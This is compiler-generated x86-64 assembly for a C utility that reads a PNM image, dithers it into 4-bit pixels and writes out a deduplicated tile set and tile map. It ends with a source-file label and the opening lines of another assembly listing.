movq -16(%rbp), %rax
movl %ecx, 4(%rax)
movl -8(%rbp), %eax
shrl $3, %eax
movl %eax, %eax
movl %eax, %ecx
leaq _ddithmask(%rip), %rax
movl (%rax,%rcx,4), %ecx
movq -16(%rbp), %rax
movl %ecx, (%rax)
movzbl -1(%rbp), %eax
andl $64, %eax
sarl $4, %eax
movzbl -2(%rbp), %ecx
andl $64, %ecx
sarl $5, %ecx
orl %ecx, %eax
movl -8(%rbp), %ecx
andl $64, %ecx
shrl $6, %ecx
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -17(%rbp)
LBB0_16:
jmp LBB0_17
LBB0_17:
movzbl -17(%rbp), %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _plot ## -- Begin function plot
.p2align 4, 0x90
_plot: ## @plot
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movb %dl, %al
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movb %al, -9(%rbp)
movl -4(%rbp), %eax
andl $1, %eax
cmpl $0, %eax
je LBB1_2
## %bb.1:
movzbl -9(%rbp), %eax
shll $4, %eax
## kill: def $al killed $al killed $eax
movb %al, -9(%rbp)
LBB1_2:
movzbl -9(%rbp), %esi
movq _pixmap@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -24(%rbp) ## 8-byte Spill
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
imull -8(%rbp), %eax
addl -4(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movq -24(%rbp), %rax ## 8-byte Reload
movslq %ecx, %rcx
movzbl (%rax,%rcx), %edx
orl %esi, %edx
## kill: def $dl killed $dl killed $edx
movb %dl, (%rax,%rcx)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _plotrgb ## -- Begin function plotrgb
.p2align 4, 0x90
_plotrgb: ## @plotrgb
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $64, %rsp
movb %r8b, %al
## kill: def $cl killed $cl killed $ecx
## kill: def $dl killed $dl killed $edx
movq ___stack_chk_guard@GOTPCREL(%rip), %r8
movq (%r8), %r8
movq %r8, -8(%rbp)
movl %edi, -36(%rbp)
movl %esi, -40(%rbp)
movb %dl, -41(%rbp)
movb %cl, -42(%rbp)
movb %al, -43(%rbp)
movb -41(%rbp), %sil
movb -42(%rbp), %al
movzbl -43(%rbp), %edx
leaq -32(%rbp), %rcx
movzbl %sil, %edi
movzbl %al, %esi
callq _brush
movl -40(%rbp), %eax
andl $3, %eax
shll $2, %eax
movl -36(%rbp), %ecx
andl $3, %ecx
addl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -44(%rbp)
movl -20(%rbp), %eax
movzbl -44(%rbp), %ecx
## kill: def $cl killed $ecx
shrl %cl, %eax
andl $1, %eax
shll $3, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
movl -24(%rbp), %eax
movzbl -44(%rbp), %ecx
## kill: def $cl killed $ecx
shrl %cl, %eax
movl %eax, %ecx
andl $1, %ecx
shll $2, %ecx
movzbl -45(%rbp), %eax
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
movl -28(%rbp), %eax
movzbl -44(%rbp), %ecx
## kill: def $cl killed $ecx
shrl %cl, %eax
movl %eax, %ecx
andl $1, %ecx
shll $1, %ecx
movzbl -45(%rbp), %eax
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
movl -32(%rbp), %eax
movzbl -44(%rbp), %ecx
## kill: def $cl killed $ecx
shrl %cl, %eax
movl %eax, %ecx
andl $1, %ecx
shll $0, %ecx
movzbl -45(%rbp), %eax
orl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
movl -36(%rbp), %eax
andl $1, %eax
cmpl $0, %eax
je LBB2_2
## %bb.1:
movzbl -45(%rbp), %eax
shll $4, %eax
## kill: def $al killed $al killed $eax
movb %al, -45(%rbp)
LBB2_2:
movzbl -45(%rbp), %esi
movq _pixmap@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -56(%rbp) ## 8-byte Spill
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
imull -40(%rbp), %eax
addl -36(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movq -56(%rbp), %rax ## 8-byte Reload
movslq %ecx, %rcx
movzbl (%rax,%rcx), %edx
orl %esi, %edx
## kill: def $dl killed $dl killed $edx
movb %dl, (%rax,%rcx)
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB2_4
## %bb.3:
addq $64, %rsp
popq %rbp
retq
LBB2_4:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _addtile ## -- Begin function addtile
.p2align 4, 0x90
_addtile: ## @addtile
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $208, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -160(%rbp)
movq %rsi, -168(%rbp)
movb $0, -177(%rbp)
movl $0, -184(%rbp)
LBB3_1: ## =>This Loop Header: Depth=1
## Child Loop BB3_3 Depth 2
cmpl $16, -184(%rbp)
jge LBB3_8
## %bb.2: ## in Loop: Header=BB3_1 Depth=1
movl $0, -188(%rbp)
LBB3_3: ## Parent Loop BB3_1 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $8, -188(%rbp)
jge LBB3_6
## %bb.4: ## in Loop: Header=BB3_3 Depth=2
movq -168(%rbp), %rax
movslq -188(%rbp), %rcx
movzbl (%rax,%rcx), %ecx
movzbl -177(%rbp), %eax
addl %ecx, %eax
## kill: def $al killed $al killed $eax
movb %al, -177(%rbp)
movq -168(%rbp), %rax
movslq -188(%rbp), %rcx
movb (%rax,%rcx), %cl
movl -184(%rbp), %eax
shll $3, %eax
addl -188(%rbp), %eax
cltq
movb %cl, -152(%rbp,%rax)
## %bb.5: ## in Loop: Header=BB3_3 Depth=2
movl -188(%rbp), %eax
addl $1, %eax
movl %eax, -188(%rbp)
jmp LBB3_3
LBB3_6: ## in Loop: Header=BB3_1 Depth=1
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, %ecx
movq -168(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -168(%rbp)
## %bb.7: ## in Loop: Header=BB3_1 Depth=1
movl -184(%rbp), %eax
addl $1, %eax
movl %eax, -184(%rbp)
jmp LBB3_1
LBB3_8:
movzbl -177(%rbp), %eax
movl %eax, %ecx
movq _hashlist@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rax
movq %rax, -176(%rbp)
LBB3_9: ## =>This Inner Loop Header: Depth=1
cmpq $0, -176(%rbp)
je LBB3_13
## %bb.10: ## in Loop: Header=BB3_9 Depth=1
leaq -152(%rbp), %rdi
movq -176(%rbp), %rsi
movl $128, %edx
callq _memcmp
cmpl $0, %eax
jne LBB3_12
## %bb.11:
jmp LBB3_13
LBB3_12: ## in Loop: Header=BB3_9 Depth=1
movq -176(%rbp), %rax
movq 128(%rax), %rax
movq %rax, -176(%rbp)
jmp LBB3_9
LBB3_13:
cmpq $0, -176(%rbp)
jne LBB3_15
## %bb.14:
movl _tilecount(%rip), %eax
movl %eax, %ecx
addl $1, %ecx
movl %ecx, _tilecount(%rip)
movl %eax, -192(%rbp)
movl %eax, -16(%rbp)
movzbl -177(%rbp), %eax
movl %eax, %ecx
movq _hashlist@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rax
movq %rax, -24(%rbp)
movl $144, %edi
callq _malloc
movq %rax, %rdx
movzbl -177(%rbp), %eax
movl %eax, %ecx
movq _hashlist@GOTPCREL(%rip), %rax
movq %rdx, (%rax,%rcx,8)
movzbl -177(%rbp), %eax
movl %eax, %ecx
movq _hashlist@GOTPCREL(%rip), %rax
movq (%rax,%rcx,8), %rdi
leaq -152(%rbp), %rsi
movl $144, %edx
movq $-1, %rcx
callq ___memcpy_chk
leaq -152(%rbp), %rdi
movq -160(%rbp), %rcx
movl $16, %esi
movl $8, %edx
callq _fwrite
movzbl -177(%rbp), %eax
movl %eax, %ecx
movq _hashcount@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %edx
addl $1, %edx
movq _hashcount@GOTPCREL(%rip), %rax
movl %edx, (%rax,%rcx,4)
jmp LBB3_16
LBB3_15:
movq -176(%rbp), %rax
movl 136(%rax), %eax
movl %eax, -192(%rbp)
LBB3_16:
movl -192(%rbp), %eax
movl %eax, -196(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB3_18
## %bb.17:
movl -196(%rbp), %eax ## 4-byte Reload
addq $208, %rsp
popq %rbp
retq
LBB3_18:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _readheader ## -- Begin function readheader
.p2align 4, 0x90
_readheader: ## @readheader
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $144, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -112(%rbp)
movq %rsi, -120(%rbp)
movq %rdx, -128(%rbp)
movq %rcx, -136(%rbp)
leaq -96(%rbp), %rdi
movq -112(%rbp), %rdx
movl $80, %esi
callq _fgets
leaq -96(%rbp), %rdi
leaq L_.str(%rip), %rsi
callq _strcmp
cmpl $0, %eax
je LBB4_2
## %bb.1:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq -96(%rbp), %rdx
leaq L_.str.1(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -100(%rbp)
jmp LBB4_12
LBB4_2:
jmp LBB4_3
LBB4_3: ## =>This Inner Loop Header: Depth=1
leaq -96(%rbp), %rdi
movq -112(%rbp), %rdx
movl $80, %esi
callq _fgets
## %bb.4: ## in Loop: Header=BB4_3 Depth=1
movsbl -96(%rbp), %eax
cmpl $35, %eax
je LBB4_3
## %bb.5:
movq -120(%rbp), %rdx
movq -128(%rbp), %rcx
leaq L_.str.2(%rip), %rsi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
leaq -96(%rbp), %rdi
callq _sscanf
movl %eax, %ecx
movl %ecx, -140(%rbp) ## 4-byte Spill
testl %eax, %eax
je LBB4_6
jmp LBB4_15
LBB4_15:
movl -140(%rbp), %eax ## 4-byte Reload
subl $1, %eax
je LBB4_7
jmp LBB4_16
LBB4_16:
movl -140(%rbp), %eax ## 4-byte Reload
subl $2, %eax
je LBB4_10
jmp LBB4_11
LBB4_6:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq -96(%rbp), %rdx
leaq L_.str.3(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -100(%rbp)
jmp LBB4_12
LBB4_7:
movq -112(%rbp), %rdi
movq -128(%rbp), %rdx
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fscanf
cmpl $0, %eax
jne LBB4_9
## %bb.8:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq -96(%rbp), %rdx
leaq L_.str.5(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -100(%rbp)
jmp LBB4_12
LBB4_9:
jmp LBB4_10
LBB4_10:
jmp LBB4_11
LBB4_11:
movq -112(%rbp), %rdi
movq -136(%rbp), %rdx
leaq L_.str.4(%rip), %rsi
movb $0, %al
callq _fscanf
cmpl $1, %eax
sete %al
andb $1, %al
movzbl %al, %eax
movl %eax, -100(%rbp)
LBB4_12:
movl -100(%rbp), %eax
movl %eax, -144(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB4_14
## %bb.13:
movl -144(%rbp), %eax ## 4-byte Reload
addq $144, %rsp
popq %rbp
retq
LBB4_14:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.section __TEXT,__literal8,8byte_literals
.p2align 3 ## -- Begin function main
LCPI5_0:
.quad 0x406fe00000000000 ## double 255
.section __TEXT,__text,regular,pure_instructions
.globl _main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $400, %rsp ## imm = 0x190
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movl $0, -276(%rbp)
movl %edi, -280(%rbp)
movq %rsi, -288(%rbp)
movl $0, -328(%rbp)
LBB5_1: ## =>This Inner Loop Header: Depth=1
cmpl $256, -328(%rbp) ## imm = 0x100
jge LBB5_4
## %bb.2: ## in Loop: Header=BB5_1 Depth=1
movl -328(%rbp), %eax
movb %al, %dl
movslq -328(%rbp), %rcx
movq _clrgamma@GOTPCREL(%rip), %rax
movb %dl, (%rax,%rcx)
## %bb.3: ## in Loop: Header=BB5_1 Depth=1
movl -328(%rbp), %eax
addl $1, %eax
movl %eax, -328(%rbp)
jmp LBB5_1
LBB5_4:
movb $1, -337(%rbp)
movb $0, -338(%rbp)
LBB5_5: ## =>This Loop Header: Depth=1
## Child Loop BB5_11 Depth 2
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, -280(%rbp)
movb %al, -361(%rbp) ## 1-byte Spill
jle LBB5_7
## %bb.6: ## in Loop: Header=BB5_5 Depth=1
movq -288(%rbp), %rax
movq 8(%rax), %rax
movsbl (%rax), %eax
cmpl $45, %eax
sete %al
movb %al, -361(%rbp) ## 1-byte Spill
LBB5_7: ## in Loop: Header=BB5_5 Depth=1
movb -361(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB5_8
jmp LBB5_22
LBB5_8: ## in Loop: Header=BB5_5 Depth=1
cmpl $2, -280(%rbp)
jle LBB5_15
## %bb.9: ## in Loop: Header=BB5_5 Depth=1
movq -288(%rbp), %rax
movq 8(%rax), %rax
movsbl 1(%rax), %eax
cmpl $103, %eax
jne LBB5_15
## %bb.10: ## in Loop: Header=BB5_5 Depth=1
movq -288(%rbp), %rax
movq 16(%rax), %rdi
callq _atof
cvtsd2ss %xmm0, %xmm0
movss %xmm0, -352(%rbp)
movl $0, -328(%rbp)
LBB5_11: ## Parent Loop BB5_5 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $256, -328(%rbp) ## imm = 0x100
jge LBB5_14
## %bb.12: ## in Loop: Header=BB5_11 Depth=2
cvtsi2ssl -328(%rbp), %xmm0
cvtss2sd %xmm0, %xmm0
movsd LCPI5_0(%rip), %xmm1 ## xmm1 = mem[0],zero
movsd %xmm1, -376(%rbp) ## 8-byte Spill
divsd %xmm1, %xmm0
movss -352(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
callq _pow
movsd -376(%rbp), %xmm1 ## 8-byte Reload
## xmm1 = mem[0],zero
mulsd %xmm1, %xmm0
cvttsd2si %xmm0, %eax
movb %al, %dl
movslq -328(%rbp), %rcx
movq _clrgamma@GOTPCREL(%rip), %rax
movb %dl, (%rax,%rcx)
## %bb.13: ## in Loop: Header=BB5_11 Depth=2
movl -328(%rbp), %eax
addl $1, %eax
movl %eax, -328(%rbp)
jmp LBB5_11
LBB5_14: ## in Loop: Header=BB5_5 Depth=1
movl -280(%rbp), %eax
addl $-1, %eax
movl %eax, -280(%rbp)
movq -288(%rbp), %rax
addq $8, %rax
movq %rax, -288(%rbp)
jmp LBB5_21
LBB5_15: ## in Loop: Header=BB5_5 Depth=1
movq -288(%rbp), %rax
movq 8(%rax), %rax
movsbl 1(%rax), %eax
cmpl $110, %eax
jne LBB5_17
## %bb.16: ## in Loop: Header=BB5_5 Depth=1
movb $0, -337(%rbp)
jmp LBB5_20
LBB5_17: ## in Loop: Header=BB5_5 Depth=1
movq -288(%rbp), %rax
movq 8(%rax), %rax
movsbl 1(%rax), %eax
cmpl $115, %eax
jne LBB5_19
## %bb.18: ## in Loop: Header=BB5_5 Depth=1
movb $1, -338(%rbp)
LBB5_19: ## in Loop: Header=BB5_5 Depth=1
jmp LBB5_20
LBB5_20: ## in Loop: Header=BB5_5 Depth=1
jmp LBB5_21
LBB5_21: ## in Loop: Header=BB5_5 Depth=1
movl -280(%rbp), %eax
addl $-1, %eax
movl %eax, -280(%rbp)
movq -288(%rbp), %rax
addq $8, %rax
movq %rax, -288(%rbp)
jmp LBB5_5
LBB5_22:
cmpl $1, -280(%rbp)
jle LBB5_26
## %bb.23:
movq -288(%rbp), %rax
movq 8(%rax), %rax
movq %rax, -360(%rbp)
leaq -112(%rbp), %rdi
movq -360(%rbp), %r8
xorl %esi, %esi
movl $80, %edx
leaq L_.str.6(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -112(%rbp), %rdi
leaq L_.str.7(%rip), %rsi
callq _fopen
movq %rax, -296(%rbp)
cmpq $0, %rax
jne LBB5_25
## %bb.24:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq -112(%rbp), %rdx
leaq L_.str.8(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -276(%rbp)
jmp LBB5_58
LBB5_25:
jmp LBB5_27
LBB5_26:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.9(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -276(%rbp)
jmp LBB5_58
LBB5_27:
movq -296(%rbp), %rdi
leaq -316(%rbp), %rsi
leaq -320(%rbp), %rdx
leaq -324(%rbp), %rcx
callq _readheader
cmpl $0, %eax
jne LBB5_29
## %bb.28:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.10(%rip), %rsi
movb $0, %al
callq _fprintf
movl $-1, -276(%rbp)
jmp LBB5_58
LBB5_29:
movl -316(%rbp), %ecx
addl $15, %ecx
andl $65520, %ecx ## imm = 0xFFF0
movq _mapwidth@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movl -320(%rbp), %ecx
addl $15, %ecx
andl $65520, %ecx ## imm = 0xFFF0
movq _mapheight@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _mapheight@GOTPCREL(%rip), %rcx
imull (%rcx), %eax
movl $2, %ecx
cltd
idivl %ecx
movslq %eax, %rdi
callq _malloc
movq %rax, %rcx
movq _pixmap@GOTPCREL(%rip), %rax
movq %rcx, (%rax)
movq _pixmap@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _mapheight@GOTPCREL(%rip), %rcx
imull (%rcx), %eax
movl $2, %ecx
cltd
idivl %ecx
movslq %eax, %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
movl $0, -332(%rbp)
LBB5_30: ## =>This Loop Header: Depth=1
## Child Loop BB5_32 Depth 2
movl -332(%rbp), %eax
cmpl -320(%rbp), %eax
jge LBB5_40
## %bb.31: ## in Loop: Header=BB5_30 Depth=1
movl $0, -328(%rbp)
LBB5_32: ## Parent Loop BB5_30 Depth=1
## => This Inner Loop Header: Depth=2
movl -328(%rbp), %eax
cmpl -316(%rbp), %eax
jge LBB5_38
## %bb.33: ## in Loop: Header=BB5_32 Depth=2
movq -296(%rbp), %rdi
callq _getc
movslq %eax, %rcx
movq _clrgamma@GOTPCREL(%rip), %rax
movb (%rax,%rcx), %al
movb %al, -339(%rbp)
movq -296(%rbp), %rdi
callq _getc
movslq %eax, %rcx
movq _clrgamma@GOTPCREL(%rip), %rax
movb (%rax,%rcx), %al
movb %al, -340(%rbp)
movq -296(%rbp), %rdi
callq _getc
movslq %eax, %rcx
movq _clrgamma@GOTPCREL(%rip), %rax
movb (%rax,%rcx), %al
movb %al, -341(%rbp)
cmpb $0, -337(%rbp)
je LBB5_35
## %bb.34: ## in Loop: Header=BB5_32 Depth=2
movl -328(%rbp), %edi
movl -332(%rbp), %esi
movb -339(%rbp), %cl
movb -340(%rbp), %al
movzbl %cl, %edx
movzbl %al, %ecx
movzbl -341(%rbp), %r8d
callq _plotrgb
jmp LBB5_36
LBB5_35: ## in Loop: Header=BB5_32 Depth=2
movl -328(%rbp), %eax
movl %eax, -384(%rbp) ## 4-byte Spill
movl -332(%rbp), %eax
movl %eax, -380(%rbp) ## 4-byte Spill
movb -339(%rbp), %sil
movb -340(%rbp), %al
movzbl -341(%rbp), %edx
leaq -32(%rbp), %rcx
movzbl %sil, %edi
movzbl %al, %esi
callq _brush
movl -384(%rbp), %edi ## 4-byte Reload
movl -380(%rbp), %esi ## 4-byte Reload
movzbl %al, %edx
callq _plot
LBB5_36: ## in Loop: Header=BB5_32 Depth=2
jmp LBB5_37
LBB5_37: ## in Loop: Header=BB5_32 Depth=2
movl -328(%rbp), %eax
addl $1, %eax
movl %eax, -328(%rbp)
jmp LBB5_32
LBB5_38: ## in Loop: Header=BB5_30 Depth=1
jmp LBB5_39
LBB5_39: ## in Loop: Header=BB5_30 Depth=1
movl -332(%rbp), %eax
addl $1, %eax
movl %eax, -332(%rbp)
jmp LBB5_30
LBB5_40:
movq -296(%rbp), %rdi
callq _fclose
leaq -192(%rbp), %rdi
movq -360(%rbp), %r8
xorl %esi, %esi
movl $80, %edx
leaq L_.str.11(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
leaq -272(%rbp), %rdi
movq -360(%rbp), %r8
xorl %esi, %esi
movl $80, %edx
leaq L_.str.12(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
movl $0, -336(%rbp)
LBB5_41: ## =>This Inner Loop Header: Depth=1
cmpl $256, -336(%rbp) ## imm = 0x100
jge LBB5_44
## %bb.42: ## in Loop: Header=BB5_41 Depth=1
movslq -336(%rbp), %rcx
movq _hashlist@GOTPCREL(%rip), %rax
movq $0, (%rax,%rcx,8)
movslq -336(%rbp), %rcx
movq _hashcount@GOTPCREL(%rip), %rax
movl $0, (%rax,%rcx,4)
## %bb.43: ## in Loop: Header=BB5_41 Depth=1
movl -336(%rbp), %eax
addl $1, %eax
movl %eax, -336(%rbp)
jmp LBB5_41
LBB5_44:
leaq -192(%rbp), %rdi
leaq L_.str.13(%rip), %rsi
callq _fopen
movq %rax, -304(%rbp)
leaq -272(%rbp), %rdi
leaq L_.str.13(%rip), %rsi
callq _fopen
movq %rax, -312(%rbp)
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl $16, %ecx
cltd
idivl %ecx
## kill: def $al killed $al killed $eax
movb %al, -345(%rbp)
movq _mapwidth@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl $16, %ecx
cltd
idivl %ecx
sarl $8, %eax
## kill: def $al killed $al killed $eax
movb %al, -344(%rbp)
movq _mapheight@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl $16, %ecx
cltd
idivl %ecx
## kill: def $al killed $al killed $eax
movb %al, -343(%rbp)
movq _mapheight@GOTPCREL(%rip), %rax
movl (%rax), %eax
movl $16, %ecx
cltd
idivl %ecx
sarl $8, %eax
## kill: def $al killed $al killed $eax
movb %al, -342(%rbp)
leaq -345(%rbp), %rdi
movq -312(%rbp), %rcx
movl $1, %esi
movl $4, %edx
callq _fwrite
movl $0, -332(%rbp)
LBB5_45: ## =>This Loop Header: Depth=1
## Child Loop BB5_47 Depth 2
movl -332(%rbp), %eax
movq _mapheight@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB5_52
## %bb.46: ## in Loop: Header=BB5_45 Depth=1
movl $0, -328(%rbp)
LBB5_47: ## Parent Loop BB5_45 Depth=1
## => This Inner Loop Header: Depth=2
movl -328(%rbp), %eax
movq _mapwidth@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jge LBB5_50
## %bb.48: ## in Loop: Header=BB5_47 Depth=2
movq -304(%rbp), %rdi
movq _pixmap@GOTPCREL(%rip), %rax
movq (%rax), %rsi
movl -332(%rbp), %eax
movq _mapwidth@GOTPCREL(%rip), %rcx
imull (%rcx), %eax
addl -328(%rbp), %eax
movl $2, %ecx
cltd
idivl %ecx
cltq
addq %rax, %rsi
callq _addtile
movl %eax, -336(%rbp)
movl -336(%rbp), %eax
## kill: def $al killed $al killed $eax
movb %al, -345(%rbp)
movl -336(%rbp), %eax
sarl $8, %eax
## kill: def $al killed $al killed $eax
movb %al, -344(%rbp)
leaq -345(%rbp), %rdi
movq -312(%rbp), %rcx
movl $1, %esi
movl $2, %edx
callq _fwrite
## %bb.49: ## in Loop: Header=BB5_47 Depth=2
movl -328(%rbp), %eax
addl $16, %eax
movl %eax, -328(%rbp)
jmp LBB5_47
LBB5_50: ## in Loop: Header=BB5_45 Depth=1
jmp LBB5_51
LBB5_51: ## in Loop: Header=BB5_45 Depth=1
movl -332(%rbp), %eax
addl $16, %eax
movl %eax, -332(%rbp)
jmp LBB5_45
LBB5_52:
movq -304(%rbp), %rdi
callq _fclose
movq -312(%rbp), %rdi
callq _fclose
cmpb $0, -338(%rbp)
je LBB5_58
## %bb.53:
movl $0, -336(%rbp)
LBB5_54: ## =>This Inner Loop Header: Depth=1
cmpl $256, -336(%rbp) ## imm = 0x100
jge LBB5_57
## %bb.55: ## in Loop: Header=BB5_54 Depth=1
movl -336(%rbp), %esi
movslq -336(%rbp), %rcx
movq _hashcount@GOTPCREL(%rip), %rax
movl (%rax,%rcx,4), %edx
leaq L_.str.14(%rip), %rdi
movb $0, %al
callq _printf
## %bb.56: ## in Loop: Header=BB5_54 Depth=1
movl -336(%rbp), %eax
addl $1, %eax
movl %eax, -336(%rbp)
jmp LBB5_54
LBB5_57:
movl _tilecount(%rip), %esi
leaq L_.str.15(%rip), %rdi
movb $0, %al
callq _printf
LBB5_58:
movl -276(%rbp), %eax
movl %eax, -388(%rbp) ## 4-byte Spill
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB5_60
## %bb.59:
movl -388(%rbp), %eax ## 4-byte Reload
addq $400, %rsp ## imm = 0x190
popq %rbp
retq
LBB5_60:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.globl _tilecount ## @tilecount
.zerofill __DATA,__common,_tilecount,4,2
.section __DATA,__data
.p2align 4 ## @bdithmask
_bdithmask:
.long 0 ## 0x0
.long 32768 ## 0x8000
.long 32800 ## 0x8020
.long 32928 ## 0x80a0
.long 41120 ## 0xa0a0
.long 42144 ## 0xa4a0
.long 42145 ## 0xa4a1
.long 42149 ## 0xa4a5
.long 42405 ## 0xa5a5
.long 44453 ## 0xada5
.long 44455 ## 0xada7
.long 44463 ## 0xadaf
.long 44975 ## 0xafaf
.long 61359 ## 0xefaf
.long 61375 ## 0xefbf
.long 65535 ## 0xffff
.p2align 4 ## @ddithmask
_ddithmask:
.long 0 ## 0x0
.long 32768 ## 0x8000
.long 32800 ## 0x8020
.long 32928 ## 0x80a0
.long 41120 ## 0xa0a0
.long 42144 ## 0xa4a0
.long 42145 ## 0xa4a1
.long 42149 ## 0xa4a5
.long 42405 ## 0xa5a5
.long 44453 ## 0xada5
.long 44455 ## 0xada7
.long 44463 ## 0xadaf
.long 44975 ## 0xafaf
.long 61359 ## 0xefaf
.long 61375 ## 0xefbf
.long 61439 ## 0xefff
.comm _pixmap,8,3 ## @pixmap
.comm _mapwidth,4,2 ## @mapwidth
.comm _hashlist,2048,4 ## @hashlist
.comm _hashcount,1024,4 ## @hashcount
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "P6\n"
L_.str.1: ## @.str.1
.asciz "PBM header: Missing P6 %s\n"
L_.str.2: ## @.str.2
.asciz "%d %d\n"
L_.str.3: ## @.str.3
.asciz "PBM header: Missing width %s\n"
L_.str.4: ## @.str.4
.asciz "%d\n"
L_.str.5: ## @.str.5
.asciz "PBM header: Missing height %s\n"
.comm _clrgamma,256,4 ## @clrgamma
L_.str.6: ## @.str.6
.asciz "%s.pnm"
L_.str.7: ## @.str.7
.asciz "rb"
L_.str.8: ## @.str.8
.asciz "Can't open %s\n"
L_.str.9: ## @.str.9
.asciz "Missing basename\n"
L_.str.10: ## @.str.10
.asciz "Not a valid PBM file.\n"
.comm _mapheight,4,2 ## @mapheight
L_.str.11: ## @.str.11
.asciz "%s.set"
L_.str.12: ## @.str.12
.asciz "%s.map"
L_.str.13: ## @.str.13
.asciz "wb"
L_.str.14: ## @.str.14
.asciz "Hash count[%d]: %d\n"
L_.str.15: ## @.str.15
.asciz "Tile count: %d\n"
.comm _pbmfile,8,3 ## @pbmfile
.comm _pbmwidth,4,2 ## @pbmwidth
.comm _pbmheight,4,2 ## @pbmheight
.comm _pbmdepth,4,2 ## @pbmdepth
.subsections_via_symbols
| the_stack_data/73905.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
